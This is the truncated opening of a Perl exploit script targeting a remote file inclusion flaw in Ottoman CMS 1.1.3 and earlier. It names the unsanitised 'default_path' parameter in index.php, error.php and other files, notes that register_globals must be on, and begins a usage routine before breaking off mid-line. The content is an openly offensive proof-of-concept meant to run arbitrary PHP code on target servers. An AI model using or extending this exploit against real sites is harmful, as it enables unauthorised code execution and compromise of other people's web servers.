#!/usr/bin/perl use IO::Socket; ################################################################################ # # # Jacek Wlodarczyk (j4ck) - jacekwlo[at]gmail[dot]com # # # ################################################################################ #Title: Ottoman CMS <= 1.1.3 Remote File Inclusion Exploit #Application: Ottoman Content Management System #Version: 1.1.3 and prior #Url: http://www.lowter.com/p/ottoman #Affected software description: #Input passed to the "default_path" parameter in "index.php", "error.php", "classes/main_class.php", "format_css.php", "js.php", #and "rss.php" is not properly sanitized before being used to include files. #Vulnerable scripts not properly sanitizing user-supplied input to the 'POST' and 'COOKIE' variables. #This can be exploited to execute arbitrary PHP code by including files from local or external resources. #Exploitation requires turn ON "register_globals" #PoC Exploit (POST method): if (@ARGV ne 4) { &usage; } sub usage() { print "\r\n (c) Jacek Wlodarczyk (j4ck)\r\n\r\n"; print "- Exploit for Ottoman CMS <= 1.1.3\r\n\r\n"; print "- Usage: $0